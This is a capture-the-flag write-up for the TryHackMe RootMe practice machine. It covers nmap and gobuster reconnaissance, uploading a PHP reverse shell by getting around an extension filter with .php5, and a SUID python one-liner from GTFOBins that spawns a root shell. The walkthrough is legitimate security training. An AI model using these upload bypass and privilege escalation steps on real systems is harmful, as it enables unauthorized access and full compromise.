TryHackMe | RootMe Write-Up
In this write-up, We are going to try to root the RootMe machine in TryHackMe.
RootMe CTF: https://tryhackme.com/room/rrootme by ReddyyZ
Let’s begin!
Let’s see if the machine is up by pinging the machine.
ping <MACHINE IP> -c 4
We can inference that this machine is a Linux machine by looking up to Time to Live (TTL) value. (ttl=128 for Windows)
Now, let’s use nmap to find open ports, what service is running on that port, what is the version of that service and OS of the machine.
nmap -p- -T4 <MACHINE IP> -v -sT -sV -O -oN output
- p- : Scan all the ports (1–65535)
- -T4 : -T: Set timing template (higher is faster)
- -v : Increase verbosity level (use -vv or more for greater effect)
- -sT : TCP Connect Scan -
- sV : Determine service/version info
- -O : OS detection
Let’s search if the OpenSSH 7.6p1 has any vulnerabilities to exploit by using searchsploit.
I do not think that this will be helpful to us right now.
Let’s take a look at the website on port 80:
Let’s use gobuster tool to find the directories in the website.
Let’s take a look at the /uploads and /panel.
I think it is really straight-forward that we’ll use /panel to upload our malicious file and open it on the /uploads site. But can we really upload a php reverse shell? Let’ see.
I am going to use the php-reverse-shell from pentestmonkey. Open up the php file and write your own ip address and the port that you want to use for a shell. I used sublime text for editing.
Let’s try to upload this php file to website.
It didn’t like our php file. Let’s try to upload a php file with a different extension.
File extension and Tags In order for the server to identify our PHP files and scripts, we must save the file with the “.php” extension. Older PHP file extensions include
- .phtml
- .php3
- .php4
- .php5
- .phps
source: What is PHP? Write your first PHP Program (guru99.com)
Let’s try this extensions.
In our case, .php5 extension has worked.
What did I do with that jpeg files? Here’s what I tried to get shell.
1-I tried to upload a cute dog image and it worked.
2-I change the extension from .jpeg to .php but it didn’t execute.
3-I change the magic number using hexeditor but it didn’t worked neither.
We got the shell by uploading a reverse php shell and opened it on /uploads. What now?
Enumaration!
Let’s use couple of commands to get information about the machine.
Let’s take a look at folders
Let’s use find / -iname “user.txt” command to find user.txt file.
user.txt is located under /var/www/user.txt and another flag is probably in the /root folder
Let’s try to Escalate our Privileges.
sudo -l : looking for an app to might allows us to run with root privileges
cat /etc/crontab: maybe there is a script running that created by root? nope.
SUID bits: files that have SUID or SGID bits set.
Python will give us a hand to gain a shell with root privileges. But how?
Let’s take a look at GTFOBins.
This command will give us a root shell. I hope:
./python -c ‘import os; os.execl(“/bin/sh”, “sh”, “-p”)’
And it did:
There is the flag located at /root.
I hope this write-up helped to those who are interested in cyber sec.
Thank you for reading.
